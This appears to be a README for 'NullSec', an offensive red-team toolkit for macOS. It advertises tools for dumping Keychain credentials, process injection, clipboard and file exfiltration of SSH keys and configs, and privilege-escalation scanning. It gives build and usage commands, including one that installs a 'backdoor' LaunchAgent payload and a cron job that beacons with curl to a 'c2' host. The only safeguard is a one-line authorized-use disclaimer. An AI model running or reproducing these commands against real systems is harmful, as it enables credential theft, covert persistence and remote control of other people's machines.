Fast, native macOS security tools written in Go, Rust, and C
High-performance red team and penetration testing utilities for Apple systems
| Tool | Description |
|---|---|
keychain_dump.go |
Extract credentials from macOS Keychain |
inject.go |
Process injection and memory manipulation |
netscan.go |
Fast concurrent ARP/port scanner |
clipboard.go |
Real-time clipboard monitoring & exfiltration |
| Tool | Description |
|---|---|
nullsec-exfil |
File discovery and exfiltration (SSH keys, configs, credentials) |
| Tool | Description |
|---|---|
privesc_scan.c |
Privilege escalation vulnerability scanner |
persist.c |
Persistence mechanism installer (LaunchAgents, cron, hooks) |
cd go
GOOS=darwin GOARCH=amd64 go build -o nullsec-keychain keychain_dump.go
GOOS=darwin GOARCH=arm64 go build -o nullsec-keychain-arm64 keychain_dump.gocd rust
cargo build --release
# Binary at target/release/nullsec-exfilcd c
clang -o nullsec-privesc privesc_scan.c -framework Security
clang -o nullsec-persist persist.c./nullsec-keychain
# Lists all keychain items and credentials./nullsec-netscan -arp # ARP scan local network
./nullsec-netscan -target 192.168.1.1 -ports 22,80,443,8080./nullsec-persist -l # List current persistence
./nullsec-persist -a backdoor '/path/to/payload' # Install LaunchAgent
./nullsec-persist -c '*/5 * * * *' 'curl http://c2/beacon' # Cron job./nullsec-privesc
# Scans for SUID binaries, writable paths, sudo misconfigs, etc.These tools are for authorized security testing only. Unauthorized use is illegal.
NullSec Framework | GitHub | bad-antics | Discord